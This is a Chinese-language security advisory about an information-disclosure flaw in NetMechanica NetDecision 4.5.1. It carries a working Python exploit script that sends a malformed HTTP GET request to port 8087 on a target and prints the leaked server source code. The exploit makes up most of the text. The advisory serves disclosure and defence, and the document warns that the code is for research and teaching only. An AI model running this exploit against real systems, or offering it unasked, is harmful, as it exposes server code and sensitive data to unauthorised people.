发布日期:2012-02-29
更新日期:2012-03-01
受影响系统:
NetMechanica NetDecision 4.5.1
不受影响系统:
NetMechanica NetDecision 4.6.1
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 52196
NetDecision HTTP Server可在Windows工作站或服务器上提供标准的HTTP服务。
NetDecision在验证畸形HTTP GET请求时存在default.nd源代码泄露问题,可导致泄露敏感信息。
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Prabhu S Angadi ()提供了如下测试方法:
#!/usr/bin/python
##############################################################################
#
# Title : Netmechanica NetDecision Traffic Grapher Server Information
# Disclosure Vulnerability
# Author : Prabhu S Angadi SecPod Technologies ()
# Vendor :
# Advisory : ?p=481
#
#
# Software : Netmechanica NetDecision Traffic Grapher Server version 4.5.1
# Date : 06/12/2011
#
###############################################################################
import socket,sys,time
if len(sys.argv) < 2:
print "\t[-] Usage: python SecPod_Exploit_Netmechanica_NetDecision_Traffic_Grapher_Server_SourceCode_Disc.py target_ip"
print "\t[-] Example : python SecPod_Exploit_Netmechanica_NetDecision_Traffic_Grapher_Server_SourceCode_Disc.py 127.0.0.1"
print "\t[-] Exiting..."
sys.exit(0)
port = 8087
target = sys.argv[1]
try:
socket.inet_aton(target)
except socket.error:
print "Invalid IP address found ..."
sys.exit(1)
try:
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((target,port))
time.sleep(1)
except:
print "socket() failed"
sys.exit(1)
exploit = "GET " + "/test.nd" + " HTTP/-1111111"+"\r\n\r\n"
print "HTTP GET request for /default.nd with invalid HTTP version triggers"+\
" the vulnerability"
data = exploit
sock.sendto(data, (target, port))
for i in range(1,10):
sock.sendto("\r\n",(target, port))
time.sleep(1)
time.sleep(10)
res = sock.recv(10000)
sock.close()
print "[+] Source Code of Netdecision Traffice Grapher Server : \r\n"
print res
sys.exit(1)
建议:
--------------------------------------------------------------------------------
厂商补丁:
NetMechanica
------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: